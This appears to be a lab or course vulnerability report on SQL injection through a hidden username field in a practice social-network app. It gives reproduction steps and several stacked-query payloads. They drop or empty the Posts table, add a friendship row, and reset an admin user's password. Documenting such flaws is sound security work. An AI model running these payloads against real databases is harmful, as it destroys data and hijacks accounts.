# Vulnerability 1: SQL injection in hidden parameter `username`

- Vulnerability: SQL injection
- Where: hidden `username` parameter of pending_requests
- Impact: Allows execution of any query on the database, in the POC we will drop the table containing all the posts

## Steps to reproduce

1. Register a user with `username`=`friend` and `password`=`request`
2. Register a second user in a separate session with `username`=`test` and `password`=`testing`
3. In the  first user send a friend request to the second user
2. In the second user go to pending_requests and in the hidden `username` input field insert `username` = `'; DROP table Posts; DROP table posts # `, the server should respond with "Internal Error" (in place of `Posts` you can place any other table that has no dependencies)
3. Go to the feed on the second user and verify that you have received an error stating that `Table 'facefivedb.Posts' doesn't exist`

[(POC)](vuln1.py)

**Note:** The last instruction of the payload `DROP table posts` is needed for the query to be executed but is not actually performed by the database because table `posts` doesn't exist

## Other Payloads:
Examples of queries of each type:
- INSERT query: username=`'; INSERT INTO Friends(username1, username2) VALUES ('a', 'b'); DROP table posts # ` (add username `a` as friend of username `b`), exemplified in [request_friend #1](../request_friend_vulns/vuln1.md)
- UPDATE query: username=`'; UPDATE Users SET password='a' WHERE username='ssofadmin'; DROP table posts # ` (change password of user `ssofadmin` to `a`, exemplified in [register #2](../register_vulns/vuln2.md)
- DELETE query: username=`'; DELETE FROM Posts; DROP table posts # ` (deletes all entries for table Posts), exemplified with similar payload in [register #3](../register_vulns/vuln3.md)